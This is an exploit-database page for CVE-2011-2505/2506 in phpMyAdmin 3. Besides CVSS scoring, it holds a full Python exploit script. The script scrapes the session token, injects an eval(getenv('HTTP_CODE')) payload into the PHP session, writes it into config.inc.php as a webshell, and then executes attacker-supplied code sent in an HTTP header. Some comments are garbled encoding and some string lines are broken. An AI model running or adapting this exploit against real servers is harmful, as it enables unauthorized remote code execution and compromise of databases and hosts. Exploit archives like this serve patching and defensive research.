Lucene search

K
exploitdbWofeiwoEDB-ID:17510
HistoryJul 08, 2011 - 12:00 a.m.

phpMyAdmin3 (pma3) - Remote Code Execution

2011-07-0800:00:00
wofeiwo
www.exploit-db.com
710
phpmyadmin
remote code execution
exploit
80sec.com
cve-2011-2505
cve-2011-2506
php.ini
configuration
form token
session id
swekey
webshell
config directory
phpsessid

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

6.6

Confidence

High

EPSS

0.199

Percentile

96.3%

#!/usr/bin/env python
# coding=utf-8
# pma3 - phpMyAdmin3 remote code execute exploit
# Author: wofeiwo<[email protected]>
# Thx Superhei
# Tested on: 3.1.1, 3.2.1, 3.4.3
# CVE: CVE-2011-2505, CVE-2011-2506
# Date: 2011-07-08
# Have fun, DO *NOT* USE IT TO DO BAD THING.
################################################

# Requirements: 1. "config" directory must created&writeable in pma directory.
#               2. session.auto_start = 1 in php.ini configuration.


import os,sys,urllib2,re

def usage(program):
    print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code
execute exploit"
    print "Usage: %s <PMA_url>" % program
    print "Example: %s http://www.test.com/phpMyAdmin" % program
    sys.exit(0)

def main(args):
    try:
        if len(args) < 2:
            usage(args[0])

        if args[1][-1] == "/":
            args[1] = args[1][:-1]

        # ��һ������ȡtoken��sessionid��sessionid��phpMyAdmin��ֵ��һ�µ�
        print "[+] Trying get form token&session_id.."
        content = urllib2.urlopen(args[1]+"/index.php").read()
        r1 = re.findall("token=(\w{32})", content)
        r2 = re.findall("phpMyAdmin=(\w{32,40})", content)

        if not r1:
            r1 = re.findall("token\" value=\"(\w{32})\"", content)
        if not r2:
            r2 = re.findall("phpMyAdmin\" value=\"(\w{32,40})\"", content)
        if len(r1) < 1 or len(r2) < 1:
            print "[-] Cannot find form token and session id...exit."
            sys.exit(-1)

        token = r1[0]
        sessionid = r2[0]
        print "[+] Token: %s , SessionID: %s" % (token, sessionid)

         # �ڶ�����ͨ��swekey.auth.lib.php����$_SESSION��ֵ
        print "[+] Trying to insert payload in $_SESSION.."
        uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA"
        url = args[1]+uri

        opener = urllib2.build_opener()
        opener.addheaders.append(('Cookie', 'phpMyAdmin=%s;
pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' %
(sessionid, sessionid)))
        urllib2.install_opener(opener)
        urllib2.urlopen(url)

        # ����setup��ȡshell
        print "[+] Trying get webshell.."
        postdata =
"phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save"
% (sessionid, token)
        url = args[1]+"/setup/config.php"

        # print "[+]Postdata: %s" % postdata
        urllib2.urlopen(url, postdata)
        print "[+] All done, pray for your lucky!"

        # ���IJ����������shell
        url = args[1]+"/config/config.inc.php"
        opener.addheaders.append(('Code', 'phpinfo();'))
        urllib2.install_opener(opener)
        print "[+] Trying connect shell: %s" % url
        result = re.findall("System \</td\>\<td
class=\"v\"\>(.*)\</td\>\</tr\>", urllib2.urlopen(url).read())
        if len(result) == 1:
            print "[+] Lucky u! System info: %s"  % result[0]
            print "[+] Shellcode is: eval(getenv('HTTP_CODE'));"

        else:
            print "[-] Cannot get webshell."

    except Exception, e:
        print e

if __name__ == "__main__" : main(sys.argv)

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

6.6

Confidence

High

EPSS

0.199

Percentile

96.3%